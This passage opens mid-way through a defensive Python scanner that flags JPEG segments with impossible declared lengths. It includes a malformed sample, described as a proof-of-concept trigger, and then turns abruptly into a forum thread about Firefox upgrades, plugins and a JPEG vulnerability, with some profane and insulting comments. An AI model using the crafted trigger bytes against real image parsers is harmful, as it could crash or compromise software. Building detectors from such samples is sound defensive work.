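        (length,) = struct.unpack(">H", data[pos + 2:pos + 4])
        if length < 2:
            findings.append((pos, marker, length))
            break
        if marker == SOS:
            break
        pos += 2 + length
    return findings


def is_well_formed(data: bytes) -> bool:
    """True when no segment declares an impossible length."""
    return not scan_jpeg(data)


# Constructed samples. HEADER is the SOI + APP0/JFIF prefix the PoC prints.
HEADER = (b"\xFF\xD8\xFF\xE0\x00\x10\x4A\x46\x49\x46"
          b"\x00\x01\x01\x01\x00\x60\x00\x60\x00\x00")
# Benign: a COM segment with a correct length (2 + 3 payload bytes), then EOI.
BENIGN = HEADER + b"\xFF\xFE\x00\x05abc" + b"\xFF\xD9"
# Malformed: the PoC's trigger, a COM segment declaring length 0.
MALFORMED = HEADER + b"\xFF\xFE\x00\x00" + b"\x45\x78\x69\x66\x00\x00\x49\x49\x2A\x00\x08\x00"

if __name__ == "__main__":
    for name, blob in (("benign", BENIGN), ("malformed", MALFORMED)):
        print(name, scan_jpeg(blob))
```

Each finding gives the byte offset of the marker, the marker type and the declared length, which is enough to write a quarantine log line or an IDS-style signature; the scanner never decodes pixel data, so it is safe to run on untrusted input itself.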
umm.. isn't college for learning?
...these aren't my real teeth.
I mean that firefox should (within reason) retain your previous plugins when you perform an upgrade..
It may do now.. haven't upgraded in a while (since before they had pretty installers and such)..
Of course if you have a plugin that relies on said vulnerability, the plugin no longer runs correctly.. but I think the chances of this are relatively slim..
I've actually been holding off upgrading because I hate trying to find and install all the plugins again (especially the good version of Adblock!!)..
i hate pansy republicans
I mean that firefox should (within reason) retain your previous plugins when you perform an upgrade..
Oh, it retained them, they just didn't work. I tried upgrading them through the extensions manager, but eventually I had to go looking for them.
Of course if you have a plugin that relies on said vulnerability, the plugin no longer runs correctly.. but I think the chances of this are relatively slim..
Right, but how would Firefox know which plug-ins were affected by the vulnerability and which were not? Do the plug-ins only call the Firefox API, or do some of them have their own API?
For example, one of the extensions I use is Image Zoom. Was this extension affected by the JPEG vulnerability? And if yes, will updating Firefox fix the vulnerability in the extension too?
I've actually been holding off upgrading because I hate trying to find and install all the plugins again (especially the good version of Adblock!!)..
I'm still waiting on Moji, Basics and Bloglines toolkit.
Geez, you guys don't get it when someone is supposed to be funny? But also it's not impossible to do this in the real world. There is a security company that does not allow Windows machines to connect to its corporate network at all. In the real world the school can require the students to buy a particular computer. It might be a Windows box, an Apple, or Linux. I remember a school that required all CS students to have an Amiga!!
Think Deeply.
Right, but how would Firefox know which plug-ins were affected by the vulnerability and which were not? Do the plug-ins only call the Firefox API, or do some of them have their own API?
For example, one of the extensions I use is Image Zoom. Was this extension affected by the JPEG vulnerability? And if yes, will updating Firefox fix the vulnerability in the extension too?
That's a very very interesting question
i hate pansy republicans
To the person who modded the parent post down from Funny 2 to 0 and all the replies from 2, 3, and 4 down to 0, -1 and offtopic: Eat shit.
If you could reason with religious people, there would be no religious people